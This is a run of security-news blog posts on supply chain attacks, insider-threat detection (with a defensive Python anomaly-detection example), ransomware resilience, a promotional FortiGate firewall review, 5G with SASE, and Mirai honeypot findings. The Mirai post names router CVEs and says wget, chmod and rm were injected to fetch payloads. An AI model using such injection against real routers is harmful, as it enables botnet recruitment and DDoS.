Cybersecurity threats are multi-faceted, often connected, and accelerating fast. Ransomware, nation-state attacks, employee errors, and third parties – all pose risks for enterprises seeking to safeguard their organizations and customers from cyber attacks and the resulting consequences.

One particularly insidious threat is the supply chain attack. In today’s interconnected, digital world that favors diverse sourcing, supply chains are increasingly vulnerable to cyber breaches. Even a seemingly small entry point – say, an outdated password on a legacy system – can open the door to massive havoc that can impact and even shut down an entire business.

What is a Supply Chain Attack and How Do They Happen?

A supply chain attack is an orchestrated strike by cybercriminals to find and take advantage of vulnerabilities in the connected network of suppliers, vendors, and contractors that support an organization’s operations – sometimes called the extended enterprise, or the 3rd/nth parties.

Bad actors use a “back door” approach by targeting these downstream suppliers or third parties with the goal of getting to the ultimate organization. Usually, the ultimate target is larger or more desirable and theoretically harder to breach. By using the smaller or less protected supplier, hackers can gain access through malware or other malicious code, such as viruses, ransomware, or other programs designed to steal data or disable systems.

The SolarWinds incident, for example, was a devastating attack on a software supplier that impacted numerous organizations, including government agencies. Another example is Log4j, where a vulnerability in a widely used open-source logging library exposed many organizations to potential attacks. There are countless other examples over the years, and hackers have only become smarter, especially as supplier networks have continued to multiply exponentially due to the many benefits they bring to an organization.

Vulnerabilities are on the rise, too: up 180% from 2022 to 2023, according to Verizon’s 2024 Data Breach Investigations Report. The same report shows vulnerability exploitation of web applications specifically represented roughly 20% of data breaches, with VPN vector exploitations expected to take up an increasing share by 2025.

Assessing the Impacts of Supply Chain Attacks

A supply chain data breach has obvious immediate implications: compromised data, the potential need to shut down systems, the cost of remediation and recovery, and the likely decline of customer trust. 

Longer-term implications include financial losses, reputational damage, regulatory penalties, and operational disruptions. In industries such as healthcare or critical infrastructure, where safety is paramount, the consequences can even become life-threatening.

Supply chain attacks also have a “ripple effect”: rarely is just one supplier impacted. Think of the chip shortage in 2023. While it was not the result of a data breach, it severely impacted Tesla that year.

Strategies to Stay Ahead of Supply Chain Attacks

To stay ahead of cyber attacks, including supply chain attacks, organizations must carefully manage their cyber and IT risk as part of a coordinated risk strategy that includes:

  • Vetting and monitoring of third parties: All third parties, including suppliers, vendors, and contractors, must be assessed when onboarding to understand their security posture and risk management practices. Ongoing monitoring is a must for continued due diligence and alerting to potential security issues. And ensure you have a robust program for offboarding third parties and suppliers. Old credentials provide an easy entry for malicious actors.
  • Enterprise-wide risk assessment: Connect risk data across divisions and globally for a complete view of risk. Use autonomous monitoring to detect potential risks and control failures to prevent malicious entry.
  • Incident preparedness: Tailor incident response plans to identify and monitor the critical suppliers in the supply chain. Ensure coordinated efforts are in place to effectively respond to security incidents. Most critically, protecting against supply chain attacks requires proactive collaboration, coordination and communication. 

Why Short-Term and Long-Term Risk Management Matter

Cyber risk management is essential because cyber threats are accelerating along with vulnerabilities, and organizations can’t afford to be complacent.

Consequences of lackadaisical risk management include immediate impacts of a breach – lost data, downtime, and costs of remediation – as well as longer-term consequences. 

Brand reputation and competitiveness are at stake, as are relationships with other suppliers. Regulatory repercussions are real, especially with the advent of resilience legislation like the EU’s Digital Operational Resilience Act (DORA) and the SEC’s Cybersecurity Rule, both of which come with stringent consequences for not managing and reporting cyber attacks.

Finally, risk leaders can even be held personally accountable for the consequences of attacks. CISOs are the most obvious candidates, but Chief Compliance Officers may also be liable. Even non-C-level leaders may not be exempt.

Stay Prepared – And Stay Ahead of Risk

With interconnected risks growing fast and technologies like AI making bad actors even smarter, the stakes in cyber risk have never been higher. Proactive, collaborative cyber risk management can’t completely prevent cyber and supply chain attacks, but it can empower organizations with agility and resilience to lessen their inevitability – and rebound with confidence.

 

The post The Underestimated Cyber Threat: Anticipating and Combatting Supply Chain Attacks appeared first on Cybersecurity Insiders.

Insider threats are a growing concern for organizations of all sizes and industries. They can be intentional or unintentional, and they can have significant consequences for the organization’s data, finances, and reputation. The threat comes from within the organization’s own ranks: a current or former employee, partner, contractor, or vendor can compromise sensitive data, whether intentionally or unintentionally, potentially working with others to achieve their goal.

What are Insider Threats?

Insider threats are attacks on an organization’s systems and data by individuals who have authorized access to the network. These threats can be categorized into three types: malicious insiders, who deliberately misuse their access rights; negligent insiders, who inadvertently cause security breaches due to carelessness or lack of awareness; and adversaries with stolen credentials, who use them to access an organization’s systems.

Insider threats can take many forms, including malicious activities such as stealing sensitive data, sabotaging systems, or collaborating with external attackers. Negligent insiders may fail to secure sensitive data, fall for phishing attempts, or fail to follow security policies. Adversaries with stolen credentials may use them to access systems, deploy malware, or steal data.

To detect insider threats, organizations must collect, consolidate, and analyze vast amounts of event data. User behavior analytics (UBA) can help establish baselines of normal user behavior and flag true threats.

The Modern Workplace and Insider Threats

The modern workplace has undergone a significant shift, with the majority of employees now working remotely or in a hybrid environment. As a result, securing company data and applications has become a top priority. Insider threats are particularly concerning, as they can be difficult to detect and resolve, with an average cost of $179,209 to contain the consequences of an insider threat. All organizations are vulnerable to insider threats, regardless of size or industry. Small and medium-sized businesses (SMBs) are particularly at risk due to their limited resources and expertise.

Types of Insider Threats

There are several types of insider threats that organizations must be aware of. These types include:

The disgruntled employee

The disgruntled employee wants to harm the organization by destroying data or disrupting business activity. These employees may be motivated by personal issues, a sense of injustice, or feeling left out of the organization’s decision-making process. They may use their access to sensitive information and systems to cause harm, making it essential for organizations to monitor and address employee dissatisfaction and potential issues.

The malicious insider

The malicious insider is an employee who steals data for personal gain. This can include intellectual property, financial information, or sensitive user data. Insiders may be motivated by financial gain, revenge, or a sense of power and control. It is crucial for organizations to implement robust security measures and monitor employee behavior to prevent or detect insider threats.

The feckless third party

The feckless third party is a business partner who compromises security through negligence, misuse, or malicious access. These partners may be unintentionally exposing their organization to security risks, such as poorly configured networks, inadequate access controls, or weak passwords. Organizations must ensure that their third-party partners are following best practices and adhering to security standards to minimize the risk of a security breach.   

Behavioral Indicators of Insider Threats

Unusual behavior is often a sign of an insider threat, which can manifest in various ways. Suspicious activity, such as account lockouts, multiple failed logon attempts, or attempts to transfer large volumes of data outside the network, can be a red flag. Additionally, behavior that is unusual for a particular individual or group, such as accessing sensitive data or resources outside of normal working hours or from unusual locations, can also indicate a potential insider threat. 
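The indicators above (failed-logon bursts, off-hours access, unusually large outbound transfers) only become useful when measured against each user's own baseline, which is what UBA does. The following is an added example, not code from the original article or any UBA product: the event tuples, thresholds, and user names are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

SIGMA = 3                            # assumed tolerance: mean + 3 standard deviations
FAIL_THRESHOLD = 5                   # assumed: failed logons that count as a burst
FAIL_WINDOW = timedelta(minutes=5)   # assumed: time span in which they must occur

def make_baseline():
    """Constructed history (not real logs): two users, ten days each."""
    events = []
    start = datetime(2024, 6, 3, 9, 0)
    for day in range(10):
        t = start + timedelta(days=day)
        for user, shift, mb in (("alice", 0, 40 + day % 3 * 5),
                                ("bob", 4, 200 + day % 2 * 20)):
            events.append((t + timedelta(hours=shift), user, "logon_ok", 0))
            events.append((t + timedelta(hours=shift + 2), user, "upload",
                           mb * 1_000_000))
    return events

def build_profiles(events):
    """Per-user baseline: usual active hours and a daily upload ceiling."""
    hours = defaultdict(set)
    daily = defaultdict(lambda: defaultdict(int))
    for ts, user, kind, nbytes in events:
        hours[user].add(ts.hour)
        if kind == "upload":
            daily[user][ts.date()] += nbytes
    profiles = {}
    for user in hours:
        totals = list(daily[user].values()) or [0]
        profiles[user] = {
            "first_hour": min(hours[user]) - 1,   # one hour of slack either side
            "last_hour": max(hours[user]) + 1,
            "upload_limit": mean(totals) + SIGMA * pstdev(totals),
        }
    return profiles

def detect(events, profiles):
    """Return (timestamp, user, rule) for every event that breaks the baseline."""
    alerts = []
    fails = defaultdict(list)
    sent_today = defaultdict(int)
    for ts, user, kind, nbytes in sorted(events):
        p = profiles.get(user)
        if p is None:
            alerts.append((ts, user, "no_baseline"))
            continue
        if kind == "logon_fail":
            # keep only failures inside the sliding window, then add this one
            fails[user] = [t for t in fails[user] if ts - t <= FAIL_WINDOW] + [ts]
            if len(fails[user]) == FAIL_THRESHOLD:
                alerts.append((ts, user, "failed_logon_burst"))
            continue
        if not p["first_hour"] <= ts.hour <= p["last_hour"]:
            alerts.append((ts, user, "off_hours_activity"))
        if kind == "upload":
            key = (user, ts.date())
            before = sent_today[key]
            sent_today[key] += nbytes
            # alert once, at the moment the daily total crosses the ceiling
            if before <= p["upload_limit"] < sent_today[key]:
                alerts.append((ts, user, "upload_volume_anomaly"))
    return alerts

# Constructed events for the day under review
D = datetime(2024, 6, 18)
TODAY = [
    (D.replace(hour=2, minute=30), "alice", "upload", 900_000_000),
    *[(D.replace(hour=10) + timedelta(seconds=20 * i), "alice", "logon_fail", 0)
      for i in range(5)],
    (D.replace(hour=13, minute=5), "bob", "logon_ok", 0),
    (D.replace(hour=15), "bob", "upload", 230_000_000),
]

if __name__ == "__main__":
    profiles = build_profiles(make_baseline())
    for ts, user, rule in detect(TODAY, profiles):
        print(ts.isoformat(), user, rule)
```

Bob's 230 MB upload raises nothing because it sits inside his own history, while the same volume from Alice would exceed her ceiling; that per-user comparison is the point of a baseline.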

Below are 10 of the most common indicators of insider threats:

1. Financial distress: When employees are struggling financially, they may be more vulnerable to temptation and may compromise company systems for personal gain.

2. Workplace tensions: Conflicts with management or colleagues can lead to disgruntled employees seeking revenge by targeting the company’s systems or data.

3. Unusual access requests: Sudden and excessive requests for access to sensitive information or documents can be a sign of an insider threat.

4. Employment history: Employees who have a history of frequent job changes or significant gaps in their employment history may be more likely to engage in insider threats.

5. Suspicious data transfers: Unusual or excessive exporting of documents and files to personal devices can indicate a potential insider threat.

6. Insufficient device security: Using personal devices for work purposes without proper security measures in place can create a vulnerability to insider threats.

7. Unusual work hours: Suspicious activity outside of regular working hours can be a sign of an insider threat.

8. Isolated behavior: Unusual behavior by employees when they are alone in the workplace, or behavior that departs from the norm, can be indicative of an insider threat.

9. Anomalous network activity: Unusual network traffic or searches can be a red flag for potential insider threats.

10. Excessive file viewing: Frequent and unusual viewing of sensitive files and documents can be a sign of an insider threat.

Mitigating the Risks of Insider Threats

To mitigate the risks of insider threats, organizations must implement several measures. One is to use a User Behavior Analytics (UBA) solution to help manage and secure access to sensitive data, systems, and accounts. Additionally, implementing the Principle of Least Privilege (PoLP) can help prevent insiders from accessing sensitive information they don’t need. It is also essential to manage and secure privileged credentials, monitor and audit privileged access, and educate employees on cybersecurity best practices. Having tools in place to help investigate and recover from insider threats is crucial. Additionally, providing regular cybersecurity training to employees and promoting a culture of cybersecurity awareness can help prevent insider threats from occurring.

NOTE: Insider threat detection and prevention is not just the responsibility of IT cybersecurity teams. Everyone in the organization, including business users, leadership teams, and IT teams, must work together to reduce the risk of insider threats.

Insider threats remain a significant concern for many organizations, as they can be challenging to identify and address without the necessary tools and expertise. It is crucial that companies prioritize securing their most valuable assets, including privileged accounts, systems, and data.

 

The post Insider Threat Detection: What You Need to Know appeared first on Cybersecurity Insiders.

With summer in full swing, most seasonal businesses are well underway. From landscape maintenance to pool care to summer rentals (vacation properties, recreational vehicles, bikes, kayaks, etc.) and more, these small businesses always face immense pressure to perform over just a few months of warm weather in most locations across the country.

Unfortunately, this pressure also makes them an ideal target for ransomware attacks. Hackers want to get paid, and they know that their odds increase when they hit businesses not only where it hurts—their data—but when it hurts—when companies are most vulnerable to the negative effects of downtime. For summer businesses, that’s during their condensed busy season.

And the fact that they’re small businesses doesn’t afford them the obscurity that they might think. While hackers extorting millions from large enterprises may make headlines, small businesses are increasingly in the crosshairs of ransomware gangs. According to recent data, more than half of the ransomware attacks in 2023 by the notorious LockBit group targeted companies with fewer than 200 employees.

There’s another harsh reality: three-fourths of these businesses would likely shut down permanently if forced to pay a ransomware demand. The combination of the ransom payment itself and the disruption to business operations would simply be too much for them. 

To counter this, seasonal businesses need to ensure they have the tools in place to quickly recover their business-critical information without having to bend to the will of a hacker. True, small businesses may lack the resources and personnel to implement the same robust cybersecurity defenses larger companies have, but the fact is that small businesses can no longer afford to ignore cyber resilience.

Getting started

The basics of cyber resilience that every small business should have in place are:

  • A backup and recovery tool – This enables swift recovery after an attack. For small businesses, this could involve a combination of on-premises plus cloud backup and recovery services. Backups should follow the 3-2-1 strategy: maintain at least three up-to-date copies of data on at least two different media with at least one offsite.
  • Endpoint protection and threat detection – Seasonal businesses should consider managed detection and response services from a reputable service provider to augment limited in-house security expertise. Also, implementing security information and event management can help improve the visibility of threats. 
  • A detailed and regularly rehearsed incident response plan – This includes documented clear procedures for containing threats, notifying stakeholders and recovering computer systems and data. Conducting regular full rehearsals of ransomware incident scenarios will help to ensure the plan is adequate and up to date. 
  • Strict discipline in patching software – Automated software security patch management across all devices, servers and software is key to fixing known vulnerabilities. Authenticated vulnerability scanning can help discover unpatched computer systems and applications. 
  • Ongoing cybersecurity awareness training – Building a security-aware culture through mandatory security training for all staff is also important. Examples of real-world phishing and social engineering attacks should be included. 

Advanced strategies 

The use of immutable backup solutions is one of the most critical advanced strategies a small business can take to secure its data and computer systems. These backups create copies of data that cannot be altered or deleted, even by privileged users. This prevents attackers from holding the data hostage through encryption during ransomware attacks. By ensuring the ability to quickly restore systems to a known clean state, immutable backups can significantly improve a business’ recovery capabilities.

Another strategy is air-gapping—physically isolating critical systems and backups from the main network. This physical separation stops the spread of threats and prevents attackers from moving laterally across the digital environment. Combined with robust backup and recovery processes, air-gapping is an effective way to protect an organization’s most sensitive data and computer systems. 

Finally, zero-trust security models help by assuming no user or device is inherently trustworthy, requiring continuous verification and authorization. By eliminating implicit trust, businesses can significantly reduce their attack surface and improve their overall security posture.

Beat the heat

The threat of ransomware attacks against seasonal businesses is as real as the heat waves we’re sure to encounter as the summer months roll on. Unfortunately, beating the “heat” from cybercriminals isn’t as simple as drinking plenty of water and enjoying the shade. Instead, small businesses need to implement the tools and strategies outlined here—ideally all within a comprehensive package that makes them easy to implement and manage—to increase their cyber resilience and avoid the potentially devastating results of successful ransomware attacks. 

 

The post Summer Seasonal Businesses Can’t Afford to Ignore Ransomware Resilience appeared first on Cybersecurity Insiders.

The management of day-to-day cloud security operations presents a multifaceted challenge for organizations, requiring a delicate balance between technological, procedural, and human factors. Multi-cloud environments significantly increase the complexity and challenges of managing and securing cloud workloads. To effectively address these challenges, organizations should leverage integrated security solutions that offer visibility and control across multi-cloud environments, supporting consistent data protection and privacy standards. Emphasizing partnerships with vendors that provide comprehensive multi-cloud security capabilities and fostering skills development can empower businesses to overcome the complexity of securing multi-cloud architectures. This approach not only mitigates the identified challenges but also harnesses the full potential of multi-cloud environments for enhanced agility, scalability, and innovation.

What are your biggest challenges securing multi-cloud environments?

Multi-cloud environments significantly increase the complexity and challenges of securing cloud workloads. Ensuring data protection and privacy in each environment is identified as the most significant multi-cloud security challenge, with 55% of respondents highlighting it as a concern.

Source: 2024 Cloud Security Report produced by Cybersecurity Insiders

                 

INTRODUCING THE FORTINET FORTIGATE CLOUD NATIVE FIREWALL (CNF)

FortiGate Cloud-Native Firewall (CNF) is a SaaS-delivered Next Generation Firewall (NGFW) service designed for cloud environments, offering scalable security for outbound traffic from multiple cloud networks without requiring network redesign or infrastructure management. It supports geolocation policies, malware protection, and compliance enforcement. Automatically scaling its network protection on AWS, FortiGate CNF meets the dynamic demands of cloud computing with ease.

“With FortiGate CNF, customers can build confidently, boost agility, and take advantage of everything AWS has to offer. As a fully managed cloud-native service, FortiGate CNF provides enterprise-level firewall services and network security that help reduce risk, improve compliance, and optimize customers’ security investments.” 

Dave Ward, GM, Application Networking, AWS

FortiGate Cloud-Native Firewall (CNF) confronts a broad spectrum of security challenges that plague modern cloud environments, focusing on mitigating threats associated with unsecured outbound traffic.

These challenges include, but are not limited to:

  • Malware: FortiGate CNF provides robust protection against connections to compromised servers, which could lead to unintentional malware downloads. By monitoring and controlling outbound traffic, it prevents malware from infiltrating the network.
  • Data Exfiltration: The solution addresses the critical issue of data exfiltration by blocking compromised systems from communicating out and sending sensitive data to unauthorized systems. This is vital for safeguarding proprietary and personal data against external threats.
  • Command and Control (C2) Communication: It effectively cuts off compromised workloads from communicating with C2 servers. By preventing these communications, FortiGate CNF disrupts the ability of attackers to execute commands or steal data, thus neutralizing the threat.
  • Crypto Mining: By identifying and blocking connections to IPs known for exploiting cloud resources for crypto mining purposes, FortiGate CNF ensures that organizational resources are not siphoned off for malicious gain.
  • Compliance Violations: The solution enforces compliance by preventing unauthorized communications with restricted or prohibited countries, systems, or entities. This feature is particularly crucial for organizations needing to adhere to strict regulatory and compliance guidelines.

KEY CAPABILITIES

FortiGate Cloud-Native Firewall (CNF) offers a suite of key features designed to fortify cloud environments against a wide range of cyber threats, ensuring seamless integration, dynamic scalability, and stringent compliance with regulatory standards.

1. Egress Security: In today’s landscape, where cloud adoption is ubiquitous, securing egress traffic has become paramount. Egress security from FortiGate CNF mitigates risks such as data exfiltration, malware propagation, and botnet activities. It enables organizations to control traffic leaving their cloud environments, ensuring that sensitive data remains protected and that malicious communications are effectively blocked.

2. Known Bad IP Filtering: Leveraging FortiGuard Labs IP Reputation Intelligence, this feature enhances security by preventing access to malicious IPs and Command and Control servers. This proactive measure significantly reduces the risk of security breaches and cyber attacks, ensuring that organizational resources are safeguarded against known threats.

Figure 1 – Known Bad IP Blocking in FortiGate CNF

3. Geo Fencing: Geo Fencing provides the ability to enforce country-level security policies with ease, a crucial capability for organizations needing to comply with regulatory requirements or to implement geographic restrictions on their cloud resources. This feature simplifies the enforcement of geo-specific rules, aiding in compliance and data sovereignty efforts.

Figure 2 – Geo Fencing Example

4. East-West Security: Protecting cloud-based workloads, including dynamic objects like serverless resources, Kubernetes resources, and auto-scaling groups, is essential for maintaining the integrity of internal networks. By enforcing network security policies dynamically, FortiGate CNF ensures comprehensive protection, facilitating secure communication and data transfer within cloud environments.

5. Dynamic Security: The ability to define security policies using intuitive objects (like countries, FQDNs, and AWS resource metadata) empowers organizations to adapt swiftly to changes in their cloud environments. This dynamic security approach reduces the need for constant manual policy updates, enhancing efficiency and responsiveness.

6. Regulatory Compliance: Assisting in meeting various regulatory compliance requirements, such as GDPR, HIPAA, and PCI-DSS, FortiGate CNF helps organizations protect sensitive data and maintain privacy standards. This capability is invaluable for businesses in highly regulated industries, providing a foundation for compliance and data protection strategies.

7. FortiGuard Labs Services: Integration with FortiGuard Labs ensures that FortiGate CNF benefits from up-to-date security intelligence, including multiple security signatures and IP reputation information. This integration enhances the overall security efficacy, offering proactive protection against emerging and existing threats.

8. AWS Firewall Manager Integration: The automation of VPC attachment and policy rollouts through AWS Firewall Manager underscores FortiGate CNF’s commitment to seamless integration and ease of use within the AWS ecosystem. This feature streamlines security management, allowing for more efficient and centralized control over cloud security policies.

Figure 3 – AWS Firewall Manager Integration

9. Advanced Network Security: By offering the latest in network security functionalities, such as IPS, AV, and SSL inspection, managed through FortiManager, FortiGate CNF ensures that organizations can maintain a high level of security without compromising on performance. This comprehensive coverage is essential for defending against sophisticated cyber threats.

10. FortiManager and FortiAnalyzer Integration: The seamless integration with FortiManager and FortiAnalyzer provides advanced management and analytics capabilities. This cohesive integration allows for the centralized management of security policies and insightful analytics, enhancing operational efficiency and security visibility across the network.

Figure 4 – Configuring FortiGate CNF to Send Logs to FortiAnalyzer

“We have been using FortiGate Cloud-Native Firewall for a few years now. It is the most stable and recommended firewall. Users with less technical knowledge can easily manage complex network and security components using it.” -Senior System Administrator

KEY BENEFITS

FortiGate Cloud-Native Firewall (CNF) stands out as a comprehensive solution for securing cloud environments, combining advanced technology and user-centric features to deliver unparalleled security. Here’s an overview of the key benefits that underscore its unique position in the market:

1. Market-Leading Security: FortiGate CNF is powered by Fortinet’s cutting-edge Next Generation Firewall (NGFW) technology, including intrusion prevention systems (IPS) and advanced threat intelligence from FortiGuard. This robust security framework ensures real-time protection against emerging and sophisticated threats.

2. Frictionless Deployment: Designed with cloud-first principles, FortiGate CNF offers a seamless deployment experience, optimizing protection for cloud networks. Its cloud-native architecture ensures that it integrates effortlessly with existing cloud infrastructures, making it an ideal solution for modern digital enterprises.

Figure 5 – The Easy-To-Use Deployment Wizard in FortiGate CNF

3. Cost-Effective Security: With its pay-for-use security model, FortiGate CNF allows organizations to only pay for the traffic that is secured across their cloud accounts, networks, and workloads. This flexible pricing ensures that businesses can maintain robust security without incurring unnecessary costs.

4. Simplified Security Management: The intuitive dashboard and predefined policies of FortiGate CNF streamline the security setup process. Customers can easily specify their security policies and network preferences, while FortiGate CNF handles the complex aspects of security management, offering a hands-off approach to network protection.

5. Consolidated Security Architecture: A single FortiGate CNF instance can protect multiple AWS accounts, networks, VPCs, and availability zones within a region. This capability provides significant economic advantages by reducing the need for multiple security solutions and simplifying the security architecture.

6. Dynamic Security Policies: FortiGate CNF’s dynamic security policies offer consistent protection that adapts to changes in cloud workloads. This eliminates the need for manual updates to security policies when IP addresses or workloads change, ensuring continuous and effective security coverage.

7. Flexible Management Options: With integration options for FortiManager and AWS Firewall Manager, FortiGate CNF provides unified control over security policies across cloud and hybrid environments. This flexibility allows for consistent security management, regardless of the deployment model or environment.

QUICK DEPLOYMENT AND FLEXIBLE PRICING OF FORTIGATE CNF

FortiGate CNF is a cloud-delivered SaaS solution that can be deployed rapidly, often within 15 minutes, offering a swift enhancement to security postures with minimal downtime. It utilizes a flexible, pay-as-you-go pricing model, billed monthly based on actual consumption, ensuring cost efficiency and scalability for organizations. This approach, combined with the option for procurement through private offers or partnerships, makes FortiGate CNF a highly accessible and adaptable security solution for modern cloud environments.

OUR VERDICT

In conclusion, FortiGate CNF is set to revolutionize how organizations approach cloud security. By streamlining security operations through the automation of infrastructure management and the deployment of predefined policies, it significantly reduces the time to protection, enabling security teams to concentrate on higher-level strategic initiatives. Furthermore, FortiGate CNF’s comprehensive coverage across outbound, east-west, and inbound traffic fortifies customers’ security posture, ensuring thorough protection against a broad spectrum of threats.

The blend of enhanced security, operational efficiency, and cost-effectiveness positions FortiGate CNF as a cornerstone of modern cloud security frameworks, underscoring its value for businesses aiming to navigate the complexities of today’s digital landscape safely.

ABOUT FORTINET

Fortinet (NASDAQ: FTNT) is a driving force in the evolution of cybersecurity and the convergence of networking and security.

Our mission is to secure people, devices, and data everywhere, and today we deliver cybersecurity everywhere you need it with the largest integrated portfolio of over 50 enterprise grade products.

Well over half a million customers trust Fortinet’s solutions, which are among the most deployed, most patented, and most validated in the industry.

FOR MORE INFORMATION: aws.fortigatecnf.com

The post FORTIGATE CLOUD NATIVE FIREWALL (FORTIGATE CNF) appeared first on Cybersecurity Insiders.

Because wide area network (WAN) connectivity has been predominantly wired broadband, cellular connectivity has often been relegated to a failover connection option. Now, organizations recognize 5G for its agility in supporting networks because it takes reliable connectivity past fixed sites and expands it to vehicle fleets, IoT devices and remote workers in places where wired broadband wouldn’t work or can’t be obtained. According to Cradlepoint’s 2024 Global State of Connectivity Report, executives believe 5G will be a key enabler for IoT, supply chain optimizations, AI/ML, and even sustainability initiatives. 

However, the broader definition of WAN brings up some very important concerns. With more and more devices on the edge of the network, how does an enterprise protect the larger attack surface it is exposing to bad actors? Enter Secure Access Service Edge (SASE), a cybersecurity model that is finally becoming mainstream. SASE, a cloud-based architecture, is designed to secure today’s corporate networks as they demand simplicity, flexibility, low latency, and security at the WAN edge. This network security model proves to be more critical in protecting enterprises with expanded attack surfaces and distributed workforces. This includes workforces that have remote and mobile users with BYODs, as well as third-party contractors with unmanaged devices who need network access.

The key to truly untethering your WAN lies in bringing these two technologies – 5G and SASE – together to create a complete reimagination of your WAN architecture. 

Understanding the differences between 5G and wired broadband

The flexibility 5G WAN provides is enticing but, before leveraging this technology, businesses must understand how it is different from wired broadband and why combining it with SASE for an agile, secure network makes sense. 

First, 5G allows a mobile component for your network. This creates mobile WAN connectivity for every organization from small businesses with delivery trucks to a public safety organization with a fleet of emergency vehicles. 5G also means a variability in bandwidth. If you leverage a wired network, a 1 gigabyte link remains a 1 gigabyte link. However, 5G bandwidth fluctuates depending on signal strength and signal quality from the connected cell tower. 

Metered links can also be an important consideration. While it’s true that unlimited data plans are starting to emerge in certain countries, most organizations still need to track data plan usage across WAN connections.

Then there are quality of service (QoS) considerations. An IP network uses the Differentiated Services Code Point (DSCP), a 6-bit field in the IP header that enables the identification of up to 64 distinct traffic classes to help define and create a class schema. Networking devices, such as routers and switches, use the DSCP code to determine the handling and queue placement of each packet. Similarly, 5G networks have a 5G QoS Identifier (5QI) value, which is a pointer to a set of QoS characteristics such as priority level, packet delay or packet error rate, to support QoS across a connection and enable class of service differentiation.

The possibilities become even more intriguing as carriers complete their roll-outs of 5G standalone (SA) networks, where enterprises can take advantage of true differentiated services through network slicing. Carriers will be able to provide “slices” of their 5G spectrum networks to offer specialized technical requirements such as low latency and higher bandwidth. Organizations will be able to subscribe to those services (or slices) based on specific application or organizational needs.

Lastly, when your WAN connectivity is delivered through cellular, there are no physical links to help you understand all the connections and dependencies in your network. This can make troubleshooting more complicated if the proper visibility tools are not in place.

Combining 5G and SASE

These considerations require a custom SASE architecture that can secure your network as you look to 5G to deliver a more agile WAN. However, you’ll want a SASE solution and approach that doesn’t limit what 5G can offer. Your 5G network and SASE solution should complement each other. 

For example, traffic steering is an important component of an agile WAN solution. It helps you prioritize certain data and makes sure there are no interruptions as data travels. When you’re leveraging 5G WAN traffic steering, the focus shouldn’t only be on latency, loss, or jitter — the solution should also steer traffic based on cellular attributes such as available bandwidth and data plan usage. 

Considering bandwidth and data plan usage as you measure WAN performance is also important. Inserting synthetic traffic into your network, thereby using more bandwidth and data, could be costly and inefficient. Instead, a smart SASE approach will measure WAN performance metrics using inline traffic. 

Efficiently securing your 5G WAN

In addition to network optimization, there’s also the “Secure” part of SASE. A SASE approach that complements 5G WAN will not only secure your network but do it efficiently. There are times when implementing network security features will take up bandwidth and hamper network performance.

For example, IPsec tunneling is often used to secure data as it moves through your network. In certain instances, network security or IT personnel will leverage a solution that encrypts the tunnel to secure traffic from an application that is already encrypted. This “double encryption” negatively impacts bandwidth and can slow down the very application someone on the network is trying to use. Alternatively, micro tunneling, as a part of your 5G and SASE architecture, creates a network security approach that protects data in transport without hampering performance and bandwidth utilization. 

While micro tunneling helps secure data transport, SIM authentication will play a starring role in securing endpoints in 5G WAN. For IoT devices, laptops, and mobile devices, SIM authentication provides a secure but simple identity source around which a security policy can be created. This would allow for a clientless security solution across both unmanaged and managed devices.

SIM authentication will also be important as your organization’s devices move from public to private 5G networks. No matter where those devices connect, the SIM card helps maintain the security policy on each device. For example, if a certain device is not authorized to upload files to your network, then that device won’t be able to upload files regardless of which 5G network provides the connection.

Finally, the combination of 5G and SASE requires a comprehensive network management solution. Since visibility and analysis of a cellular network can be difficult, it will help if you can leverage a network management solution that brings in valuable cellular health metrics to make remediation less complex. 

5G and SASE: Preparation for the future

For any business or organization, it’s always important to combine the latest technology with the best security features. 5G WAN is no different. 5G and SASE help you take your network to new places, while making sure your network is always safe. It’s like having a bodyguard for your mobile devices and data even as they move past the confines of an office space or headquarters. 

And let’s not forget about the 5G network capabilities to come. As 5G standalone networks give way to more mainstream network slicing, a comprehensive network approach that combines 5G and SASE will provide efficiency and security for the networks of today — while setting the foundation for networks of the future.

 

The post 5G and SASE: Reimagining WAN Infrastructure appeared first on Cybersecurity Insiders.

Already in 2024, we successfully defended against 5.8 million Mirai-related attacks and saw a spike in honeypot activity related to Mirai, all aimed at exploiting vulnerabilities in aging router systems. These attacks exhibit striking similarities, a theme we will explore further in subsequent sections of this blog. By understanding the common threads among these exploits, we can better fortify our defenses against future incursions and safeguard our network infrastructure from potential compromise. To facilitate this understanding, we are committed to continually releasing threat intelligence to ensure the industry has the most complete and updated information related to attacks on small- and medium-sized businesses (SMBs). Our research team has created five signatures across our product portfolio to ensure our customers are protected from this increasing threat.

Mirai is a significant malware threat known for targeting Internet of Things (IoT) devices, such as routers and IP cameras, to form extensive botnets. Emerging in 2016, Mirai exploits weak default credentials and vulnerabilities to compromise devices, granting attackers remote access. These compromised devices are then utilized to orchestrate large-scale Distributed Denial of Service (DDoS) attacks, posing a substantial threat to internet infrastructure worldwide. 

Tracing the Path of Mirai’s Evolution

Mirai, created by Paras Jha, Josiah White and Dalton Norman, was crafted to exploit IoT device vulnerabilities for botnet recruitment. Initially, it was detected in August 2016 by MalwareMustDie researchers during a large DDoS attack on Brian Krebs’ cybersecurity site. Mirai’s source code was subsequently released by its creators in September. This release spawned numerous malware iterations, intensifying IoT security concerns. The most memorable incidents included the unprecedented 620 Gbps DDoS attack on KrebsOnSecurity and the October 2016 Dyn cyberattack, which paralyzed internet services for major platforms like Twitter and Netflix. In 2024, we have already prevented 13.6 million attacks against IoT devices, which is a 29% increase from 2023.

Mirai operates through a systematic sequence of steps: scanning for vulnerable IoT devices, exploiting weaknesses like default credentials to gain entry, infecting them to form a botnet and launching potent DDoS attacks. It spreads by continuously seeking new targets and adapts dynamically to evade detection and mitigation efforts as explained in Figure 1.

Figure 1: Mirai attack chain

Honeypot Insights

SonicWall’s honeypots found Mirai spreading through exploits that target old vulnerabilities in routers from Zyxel, Netgear, D-Link and TP-Link. Let us examine some of the honeypot findings through the similarities in attack patterns.

1. Injection of Commands: Each attack attempts to inject and execute commands on the targeted device. These commands are typically aimed at downloading additional malicious payloads, granting unauthorized access or otherwise compromising the device. For example, in the packet captured from our honeypots in Figure 1, wget, chmod and rm commands are injected.

Figure 2: Zyxel USG FLEX 100W Command Injection (CVE-2022-30525)

2. HTTP/HTTPS Requests: All attacks involve HTTP requests to interact with the device’s web interface or execute commands remotely. They manipulate URLs or parameters to exploit vulnerabilities in the target devices. For example, in the packet captured from our honeypots in Figure 2, an HTTP request is made to the device’s GetDeviceSettings endpoint to execute wget and chmod commands.

Figure 3: D-Link Devices HNAP SOAPAction-Header Command Execution CVE-2015-2051

